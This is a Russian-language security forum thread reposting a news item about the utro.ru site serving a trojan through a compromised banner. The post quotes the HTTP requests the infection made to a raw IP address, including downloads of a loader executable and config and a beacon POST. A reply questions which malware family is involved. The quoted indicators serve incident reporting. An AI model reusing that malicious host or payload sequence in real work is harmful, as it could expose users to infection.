Показано с 1 по 2 из 2.

Сайт utro.ru в течение нескольких часов распространял опасный троян

  1. #1
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для ALEX(XX)
    Регистрация
    31.03.2005
    Адрес
    Чернигов
    Сообщений
    10,777
    Вес репутации
    3731

    Сайт utro.ru в течение нескольких часов распространял опасный троян

    Сегодня во второй половине дня, пользователи, зашедшие на сайт utro.ru, увидели предупреждение антивируса о попытке заражения троянской программой, эксплуатирующей уязвимости в Internet Explorer и Mozilla Firefox.

    При подробном изучении троян выполнял следующий запрос:

    GET /e1/index.php HTTP/1.1\r\n
    Referer: http://utro.ru/includes5/banners/advert_part.html/r/n
    Host: 81.95.149.66\r\n


    а дальше происходила загрузка бота:

    GET /e1/file.php HTTP/1.1\r\n
    GET /ldr1.exe HTTP/1.1\r\n
    GET /cfg.bin HTTP/1.0\r\n
    POST /s.php?1=april_002fdf3f&i= HTTP/1.0\r\n


    В результате атаки, в корне диска с: появлялся файл 3.tmp, который детектируется большинством антивирусов как Trojan-Spy.Win32.Bancos.aam. В windows/system32 записывался файл ntos.exe, который также определялся как Trojan-Spy.Win32.Bancos.aam.

    По информации из Лаборатории Касперского троян шифрует пользовательские данные на компьютере и предлагает купить расшифровщик. В случае отказа, грозится выложить приватные данные пользователя в сети интернет.

    В результате атаки могли пострадать несколько десятков тысяч пользователей сайта.

    securitylab.ru
    Left home for a few days and look what happens...

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.09.2006
    Сообщений
    5,658
    Вес репутации
    1838
    Вроде бы почерк последнего GPCode, а не Bancos. Хм...
    [I]Nick Golovko
    NCFU lecturer, information security specialist[/I]

Похожие темы

  1. опасный сайт
    От borona в разделе Спам и мошенничество в сети
    Ответов: 6
    Последнее сообщение: 03.06.2011, 06:35
  2. Сайт «Альфастрахования» распространял трояны через эротику
    От DVi в разделе Новости компьютерной безопасности
    Ответов: 4
    Последнее сообщение: 27.11.2008, 16:27
  3. Сайт антивирусной компании распространял вирус
    От SDA в разделе Новости компьютерной безопасности
    Ответов: 1
    Последнее сообщение: 12.03.2008, 22:15
  4. Сайт Rbc.ru распространял опасный троян
    От ALEX(XX) в разделе Новости интернет-пространства
    Ответов: 12
    Последнее сообщение: 26.06.2007, 18:52

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00703 seconds with 17 queries